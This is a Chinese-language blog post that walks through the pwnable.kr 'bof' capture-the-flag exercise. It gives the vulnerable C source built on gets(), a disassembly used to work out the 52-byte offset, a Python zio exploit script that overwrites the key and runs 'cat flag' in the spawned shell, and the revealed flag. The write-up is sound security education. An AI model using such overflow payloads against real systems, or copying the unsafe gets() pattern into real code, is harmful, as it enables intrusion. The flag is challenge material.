美文网首页
pwnable.kr [Toddler's Bottle

pwnable.kr [Toddler's Bottle

作者: Umiade | 来源:发表于2017-06-14 22:49 被阅读196次

Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

简单的栈溢出练习。
源码如下:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

这里需要构造栈溢出,淹没至前一个栈帧的当前函数的参数位置。
linux下可以借助gdb进行动态调试,利用objdump进行静态反编译。
这里可使用objdump来静态查看栈分配情况objdump -d bof
由题设只需关注main()和func()

0000062c <func>:
 62c:   55                      push   %ebp
 62d:   89 e5                   mov    %esp,%ebp
 62f:   83 ec 48                sub    $0x48,%esp
 632:   65 a1 14 00 00 00       mov    %gs:0x14,%eax
 638:   89 45 f4                mov    %eax,-0xc(%ebp)
 63b:   31 c0                   xor    %eax,%eax
 63d:   c7 04 24 8c 07 00 00    movl   $0x78c,(%esp)
 644:   e8 fc ff ff ff          call   645 <func+0x19>   ; call printf()
 649:   8d 45 d4                lea    -0x2c(%ebp),%eax  ; char[32] -- offset to ebp
 64c:   89 04 24                mov    %eax,(%esp)       ; 传参
 64f:   e8 fc ff ff ff          call   650 <func+0x24>   ; call gets()
 654:   81 7d 08 be ba fe ca    cmpl   $0xcafebabe,0x8(%ebp)
 65b:   75 0e                   jne    66b <func+0x3f>
 65d:   c7 04 24 9b 07 00 00    movl   $0x79b,(%esp)
 664:   e8 fc ff ff ff          call   665 <func+0x39>
 669:   eb 0c                   jmp    677 <func+0x4b>
 66b:   c7 04 24 a3 07 00 00    movl   $0x7a3,(%esp)
 672:   e8 fc ff ff ff          call   673 <func+0x47>
 677:   8b 45 f4                mov    -0xc(%ebp),%eax
 67a:   65 33 05 14 00 00 00    xor    %gs:0x14,%eax
 681:   74 05                   je     688 <func+0x5c>
 683:   e8 fc ff ff ff          call   684 <func+0x58>
 688:   c9                      leave  
 689:   c3                      ret    

0000068a <main>:
 68a:   55                      push   %ebp
 68b:   89 e5                   mov    %esp,%ebp
 68d:   83 e4 f0                and    $0xfffffff0,%esp
 690:   83 ec 10                sub    $0x10,%esp
 693:   c7 04 24 ef be ad de    movl   $0xdeadbeef,(%esp)
 69a:   e8 8d ff ff ff          call   62c <func>
 69f:   b8 00 00 00 00          mov    $0x0,%eax
 6a4:   c9                      leave  
 6a5:   c3                      ret    
 6a6:   90                      nop

可以发现 char overflowme[32] 在当前栈帧中距离EBP的偏移为0x2c,即44,再加上ESP的4,返回地址的4,即从局部变量overflowme首地址52byte的位置即为当前函数的参数key的地址。
借助python库zio(an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.)写脚本跑出flag。

from zio import *
host = "pwnable.kr" #143.248.249.64
port = 9000
io = zio((host, port), print_read=False, print_write=False)
payload = "a"*52 + "\xbe\xba\xfe\xca" + "\n"
io.write(payload+"\n")
io.write("cat flag\n")
buf = io.read_until("\n")
print buf
$ python run.py
daddy, I just pwned a buFFer :)

相关文章

网友评论

      本文标题:pwnable.kr [Toddler's Bottle

      本文链接:https://www.haomeiwen.com/subject/mdneqxtx.html